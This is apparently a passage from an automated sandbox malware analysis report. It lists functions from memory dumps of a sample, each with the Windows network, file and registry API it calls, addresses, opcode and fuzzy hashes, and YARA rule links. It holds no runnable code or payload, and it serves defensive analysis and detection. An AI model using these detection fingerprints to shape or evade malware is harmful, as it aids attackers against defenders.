Instruction Fuzzy Hash: 5921D072600205AFEB208A25CD44FABBBACEF04624F08845AED45CA641D364E5488AB2

Function 0143BDA2 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0143BE21

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 624e5c55840007aa0fb76466d38df0d9240dffa9b5a8eaa0222d46bae1c50c47
Instruction ID: 527758ee9c90e1c187a5399d467858bf35be75657b99dd2d8caa01c255aaa97a
Opcode Fuzzy Hash: 624e5c55840007aa0fb76466d38df0d9240dffa9b5a8eaa0222d46bae1c50c47
Instruction Fuzzy Hash: C621B575600200AFEB21CF6ACD85B66FBE8EF08324F04845AEA458B752D371E409CB71

Function 0143B420 Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E24), ref: 0143B4BB

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7e11881a1544c4dd6d09a784b796ececca860aae74074275b5fed18923a86e73
Instruction ID: 9898ef06fc115d711a11ed7870466d8368c37eec5bda151d1c92fff96866a135
Opcode Fuzzy Hash: 7e11881a1544c4dd6d09a784b796ececca860aae74074275b5fed18923a86e73
Instruction Fuzzy Hash: 3D21F5754053806FE722CB15CD85BA6BFB8DF46324F0880DAE9449B293C278A949CB75

Function 0622222A Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 062222B9

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 582cb153c628c4be198997c8290587ab3e2f3679f947b8659e2e59ba00b13323
Instruction ID: b41d044da95cb9713aa7f5e005f79ebed8ebe0a03482b27ad1a12f848969a90c
Opcode Fuzzy Hash: 582cb153c628c4be198997c8290587ab3e2f3679f947b8659e2e59ba00b13323
Instruction Fuzzy Hash: 0A21D775409384AFD7228B11DC44F96FFB8EF06310F0885CBE9848B5A3D365A908CB72

Function 0622151A Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 0622159E

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 987ed788d5ad92d967b4dc819633de1ee61f31c835b8e9032cf8926fb1e162c1
Instruction ID: 8158367d22b4e430f61e19d409f992b6104bcf15a07234da36ea3b801fbcb3bb
Opcode Fuzzy Hash: 987ed788d5ad92d967b4dc819633de1ee61f31c835b8e9032cf8926fb1e162c1
Instruction Fuzzy Hash: A5219FB68053846FD722CB51CC88F97BBACEF45224F08849BEA45DB652D234E548CBB5

Function 0622135A Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 062213D5

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 878c78b02fc7b992b7d05b45214f6b231b164ab9eacf919b1d0da9be578d0ace
Instruction ID: f11094d84920c6bb7d8684ad13dc9157bc4b231ba6af61df815b494028ec7233
Opcode Fuzzy Hash: 878c78b02fc7b992b7d05b45214f6b231b164ab9eacf919b1d0da9be578d0ace
Instruction Fuzzy Hash: 2921BE75510201AFEB20CF51CC84FA6F7E8EF08710F08846AEE458BA52D330E958CBB1

Function 06220D9A Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 06220E0D

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 1099716f99d88a6089b65e5ead5ba310643c1a25448031da6a1db3177d43bce3
Instruction ID: c95819f66852161871a4c621c77e931472572efe2cb0df592a4edc9dea1f4827
Opcode Fuzzy Hash: 1099716f99d88a6089b65e5ead5ba310643c1a25448031da6a1db3177d43bce3
Instruction Fuzzy Hash: 2521C571600200AFE750CF65CD45BAAFBE8EF04220F048859ED49CB742D771E548CBB1

Function 062215E8 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 06221677

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: 756905a2b769a00502c2808acf51f90b119e249bad94870e4907690d8ccdedfe
Instruction ID: b45993e146e25439fafbd462a56a229a8cfb04db5c504aa7a36aa495566fd2ae
Opcode Fuzzy Hash: 756905a2b769a00502c2808acf51f90b119e249bad94870e4907690d8ccdedfe
Instruction Fuzzy Hash: 7821D4754093846FD7228B11DC45FA6FFB8EF42314F0C84DBE9848B693D265A948CBB6

Function 062200E2 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 06220161

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e7ec7846872146fea65eeb461cbf2b47f2f07910881564b373fddc186ba2ac86
Instruction ID: 1858c42728c3591bd9bceab668272a7e89e527eb1ea79448d9d2fcd897fc13f9
Opcode Fuzzy Hash: e7ec7846872146fea65eeb461cbf2b47f2f07910881564b373fddc186ba2ac86
Instruction Fuzzy Hash: 4721A176405384AFDB22CF51DC44F97BFB8EF45324F08849AE9849B552C235A548CBB2

Function 056D0007 Relevance: 1.6, Strings: 1, Instructions: 320COMMON

Download Yara Rule

Strings

:@k, xrefs: 056D03BA

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID: :@k
API String ID: 0-2277858631
Opcode ID: a90e5fe283e6f505657e49356f3f95edad9e07252ce4289781b055a9e5393fce
Instruction ID: 05a2790d430768e86ca8db31703e0729022062c0d768e5e284127611c9c9c03d
Opcode Fuzzy Hash: a90e5fe283e6f505657e49356f3f95edad9e07252ce4289781b055a9e5393fce
Instruction Fuzzy Hash: A8D1C134304381CFD705DF38E54879ABBB2FBA5609F108559E4418B3A9DB799C1ACBA1

Function 062222F6 Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0622237A

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 36bb366e4b8b883f0a92b7ba1da57f11972f7f4cc6b28c93c9e4172f8f2ac198
Instruction ID: ad7238bd9275ffcd0a81eb48c72d953f0e32b532c31afdd12e93375ae8bda1b7
Opcode Fuzzy Hash: 36bb366e4b8b883f0a92b7ba1da57f11972f7f4cc6b28c93c9e4172f8f2ac198
Instruction Fuzzy Hash: 24218C75409381AFDB228F61C884A92BFF4FF0A210F0984DAE9858B563D275A909DB61

Function 0143B70E Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 0143B788

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 743701c20d6520833e300c9cb06002daff0587879bda25ada41872ec63ca9d04
Instruction ID: 29932cb35234270d598e839439f9231d2103e623e6dc0a3334ab169c7b9a353d
Opcode Fuzzy Hash: 743701c20d6520833e300c9cb06002daff0587879bda25ada41872ec63ca9d04
Instruction Fuzzy Hash: 7F215E75600204AFE721CE15CD85FA7BBECEF48614F08845AE945CB762D770E948CBB1

Function 062209F6 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 06220A61

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: e4edaa4eeafcf4a3a8b25d3313ed2fb9a35e522850f39e9c2762111f423716cf
Instruction ID: 661f9b6a4565d21a0dace6b3620321fe8479e22b99bf9e163c056e07f7320934
Opcode Fuzzy Hash: e4edaa4eeafcf4a3a8b25d3313ed2fb9a35e522850f39e9c2762111f423716cf
Instruction Fuzzy Hash: 2D21D5B1910200AFE750CF66CD45B66FBE8EF04324F04845AEE498B742D375E509CBB2

Function 0622043E Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 062204AA

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: fe3f577ab7f2f895b287729721de27742cae92b310ad059063d3d8a8730776fc
Instruction ID: a659d7daaeb5de8810da022592c8756f8a4d7682322982da18a80101d6b244dd
Opcode Fuzzy Hash: fe3f577ab7f2f895b287729721de27742cae92b310ad059063d3d8a8730776fc
Instruction Fuzzy Hash: 9E21D171500200AFEB21CF56DD45BA6FBE8EF18324F04885EED468AA52C375E509CBB2

Function 06220AF6 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 06220B6A

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 5335ac105a9a69ae9b25674ff0f7af8c633213f7e8ff062423ed158f4d31453e
Instruction ID: a67fdc9877627b8f12d7f264e1e12c2b25a6634b393b4e16c0372ce6521ebecf
Opcode Fuzzy Hash: 5335ac105a9a69ae9b25674ff0f7af8c633213f7e8ff062423ed158f4d31453e
Instruction Fuzzy Hash: 7021C072510204AFE721CF56CD85FA6FBE8EF08328F04845DE9458BA52D375E549CBB2

Function 062227DA Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 0622283E

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: d10247ef44c226d5d8088a7bdf84c6df506609d84d5b75988173ca0e9d09634b
Instruction ID: fced734bf870389a315258ba746ae89211612ea70ca44a904c2916445f4470fe
Opcode Fuzzy Hash: d10247ef44c226d5d8088a7bdf84c6df506609d84d5b75988173ca0e9d09634b
Instruction Fuzzy Hash: 3411AF75A10205AFE760CB16DD84FAAB7E8EF04320F08846AED45CB651D775E948CAB2

Function 062216EA Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 0622174D

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 6249c9a3021016d5fd0804ff2c91aa5217ca88f59cdaf89063a03f8dcc19674c
Instruction ID: 67b845efab143b601567b3eb481f11486ac76dd6c5217aa1eb592f706457a36a
Opcode Fuzzy Hash: 6249c9a3021016d5fd0804ff2c91aa5217ca88f59cdaf89063a03f8dcc19674c
Instruction Fuzzy Hash: 0811D375900204AEE7209F15DD45FBAFBACEF44320F04845AEE448F642D374E54D8AB1

Function 0143A73E Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E24,?,?), ref: 0143A7C2

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 7294c9c97169bed6936dfd44be394685cfc34cd48471f11db0771d6f7cca441d
Instruction ID: 2c7f19e5039c1a2442341b0f386999b8efc2c4e3d58e8841267400cb4afaab56
Opcode Fuzzy Hash: 7294c9c97169bed6936dfd44be394685cfc34cd48471f11db0771d6f7cca441d
Instruction Fuzzy Hash: D71129715053406FD3118B15DC41F72BFB8EF86620F05809AEC4897A43D235B919C7B2

Function 0622075A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 062207CC

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0a59ffe7fa881c968be6d4a372dccafdf7570ab08c210ef78ffc79b23692989e
Instruction ID: 15ad918ff556a702b0c7cffd1ae57f62d5385522460ae6a6b5a15eae73e5b3b4
Opcode Fuzzy Hash: 0a59ffe7fa881c968be6d4a372dccafdf7570ab08c210ef78ffc79b23692989e
Instruction Fuzzy Hash: BD11BE76910601AFE760CF16CC84FA7F7E8EF04720F08845AED458BA52D764E849CBB2

Function 062218EE Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 06221958

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 8c090bcb4f7ce3cca3d5dba271cec0b67f5b758ac4810fef0616b86e30367906
Instruction ID: 31dcd83e8024f255be2b9bd3d366820c6b95127afbfdfc7db7c596ce7e8a89ee
Opcode Fuzzy Hash: 8c090bcb4f7ce3cca3d5dba271cec0b67f5b758ac4810fef0616b86e30367906
Instruction Fuzzy Hash: 4811AF76500204AEEB21CF51CD44FEAB7ECEF05324F04885AEE459BA42D374E558CBB1

Function 0622106A Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 062210C9

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: bd13526161e5c9be850b2ce29f45d29fc245c90375fac63048e83e46a3238dc1
Instruction ID: 0bc25e28e7133c924b2b81cafdf30d7f3e1820130751abad76a04bc980f0bf9f
Opcode Fuzzy Hash: bd13526161e5c9be850b2ce29f45d29fc245c90375fac63048e83e46a3238dc1
Instruction Fuzzy Hash: 9C11E676510201AFEB618F55DC44FAAF7E8EF14320F08846AEE458B651D374E558CBB1

Function 06221DC0 Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 06221E38

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: c9aacf0e10c2327edf6b8b4518d84f129529a9e18cd7f85edc99d6d86bdea8d4
Instruction ID: f17ff94fc13bf97f07b7cfb94209b4527750bf896ac1fd02b97e680d16d1ea2b
Opcode Fuzzy Hash: c9aacf0e10c2327edf6b8b4518d84f129529a9e18cd7f85edc99d6d86bdea8d4
Instruction Fuzzy Hash: AB11B6755093846FD722CB11DC44F96FFB8EF46724F0880DAEA449B693C268A948CB72

Function 0622153A Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 0622159E

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 9f205d93a19b7af53d510bcfe9c6070e1b36cefe9e3eaef6f46eaff0a3335816
Instruction ID: d863e724f3762aa1e397da53a3ee6737f93fe10d5095474fd55b8996c86b5d19
Opcode Fuzzy Hash: 9f205d93a19b7af53d510bcfe9c6070e1b36cefe9e3eaef6f46eaff0a3335816
Instruction Fuzzy Hash: CB11D3B6500204AEE721CB51CC84FAAB7ECDF04324F088466EE058B641D774E558CBB1

Function 062226F2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 0622274E

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: b65ca938944c70660efd932bd0266681ffca562148506354f967b840221088c0
Instruction ID: 8f080592df698dfc30f758da28072204f22ae35933132db314c8aac5ad71a125
Opcode Fuzzy Hash: b65ca938944c70660efd932bd0266681ffca562148506354f967b840221088c0
Instruction Fuzzy Hash: E711E276914200AFEB618F15DD44BAAF7E8EF44320F08846AED459F641D375E548CBB1

Function 06222CF2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06222D66

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1e23663d00ff5ba9d6b8c7d47430c3b585249c2e4871a9f84d82fec59eb1c91d
Instruction ID: 21519085f392ff77a2102c1a4dcfbaea7d83e42a55e7c29743a46363f036caff
Opcode Fuzzy Hash: 1e23663d00ff5ba9d6b8c7d47430c3b585249c2e4871a9f84d82fec59eb1c91d
Instruction Fuzzy Hash: F7218131449780AFDB228F61DC44B52FFF4EF46320F0888DAED858B562D276A518CB62

Function 06220102 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 06220161

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f8c950ba37a0ebbd20badde6a65fadd818fb9736ecd60772786d45fdad884bad
Instruction ID: 3fe960f7145116bfd48bcd332e808baeeb33ca0694d50bd10f53d7a1678d47f0
Opcode Fuzzy Hash: f8c950ba37a0ebbd20badde6a65fadd818fb9736ecd60772786d45fdad884bad
Instruction Fuzzy Hash: 3B11E376910204AFEB61CF51DD84FAAFBE8EF44324F08845AED458BA52C375E548CBB1

Function 0622127E Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 062212D7

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: faddf3e6d75a91c98bcbe2e0910651a1327db71c35e26034bdab94467a4adde6
Instruction ID: b4d1019d12b834b1a5778f26f8cfc4c0b7b3570e5ea8b0ee4b0773d3ee525460
Opcode Fuzzy Hash: faddf3e6d75a91c98bcbe2e0910651a1327db71c35e26034bdab94467a4adde6
Instruction Fuzzy Hash: B811E3B5910200AFEB60CF11CD44FAAF7E8EF05324F08845AEE449BA42C374E508CBB5

Function 0622225A Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 062222B9

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: ccf3bf3cd0230cc285596e65bd9a8b197dafc4bfba26b228b073ef313e48952e
Instruction ID: 83ec2dd44dd43d788ab9f4d411e296f8ec9a468b56c6cd45eb38a8e4cbed4a5e
Opcode Fuzzy Hash: ccf3bf3cd0230cc285596e65bd9a8b197dafc4bfba26b228b073ef313e48952e
Instruction Fuzzy Hash: 4C1102B6510200EFEB218F01CD44FAAFBE8EF15724F08C15AED454AA52C372E548CBB6

Function 0143B452 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E24), ref: 0143B4BB

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8279fecb6614d03caf10be112dcda2b759f48620851d21a88b743cff9bce3fa3
Instruction ID: 8249fca947a07800877fe86284b6142b1f6441322ed96fcdf4d8e0023a094c4a
Opcode Fuzzy Hash: 8279fecb6614d03caf10be112dcda2b759f48620851d21a88b743cff9bce3fa3
Instruction Fuzzy Hash: 0D112575500200AEE720CB15DD81BA6F7A8DF54720F04805AEE044A792C3B4E549CBA5

Function 0143A2AE Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0143A30C

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b068e2ea38f2fb5141c009e7e10d513bf369b9434902cddbabd2c3e960592e94
Instruction ID: 727f3fe3b7162082522575b73d4856fac33269db9c1469b6b5403547f8852793
Opcode Fuzzy Hash: b068e2ea38f2fb5141c009e7e10d513bf369b9434902cddbabd2c3e960592e94
Instruction Fuzzy Hash: DC118F754493C06FDB238B25DC54A62BFB4DF47224F0980CBED848B263D265A918C772

Function 0622161E Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 06221677

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: ce0c0dd8b319f83de8162546568b3fbeb2681b9fd6e106df49dfe31bf7b10b98
Instruction ID: ebd5cd0be1a349cdd5f19d55ea936fce3168b315ccfefe1fa0f13d24315b6b1a
Opcode Fuzzy Hash: ce0c0dd8b319f83de8162546568b3fbeb2681b9fd6e106df49dfe31bf7b10b98
Instruction Fuzzy Hash: 7311C275910205AFE7208B01CD84FAAF7A8EF04324F08805AEE044A642D374E559CAB5

Function 0143A078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0143A0D5

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 17072ed6d076dbf0d43ab01273ea5f907cc3df64e50dfe7ae785ce471a6b3752
Instruction ID: 08362d394bafd042d571a3d42b64545bccefe9378b044b212f728a0d4e423459
Opcode Fuzzy Hash: 17072ed6d076dbf0d43ab01273ea5f907cc3df64e50dfe7ae785ce471a6b3752
Instruction Fuzzy Hash: 78119175509380AFDB22CF15DC44B56FFB4EF4A224F08C49BED848B663C275A918CB62

Function 06221DE2 Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 06221E38

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: b52dddd8c1f0b0b0d4131fca1797a518ee4104b1a9eae3441ad123473c43575a
Instruction ID: c962596310161459ec69fb4efe83c40890ba01d55ee53e952c5119bc3ec4df89
Opcode Fuzzy Hash: b52dddd8c1f0b0b0d4131fca1797a518ee4104b1a9eae3441ad123473c43575a
Instruction Fuzzy Hash: A4010475910205AEEB608F01CC89FA6FBE8DF05724F08C05AEE048BA42D374E548CBB1

Function 0143BEBA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

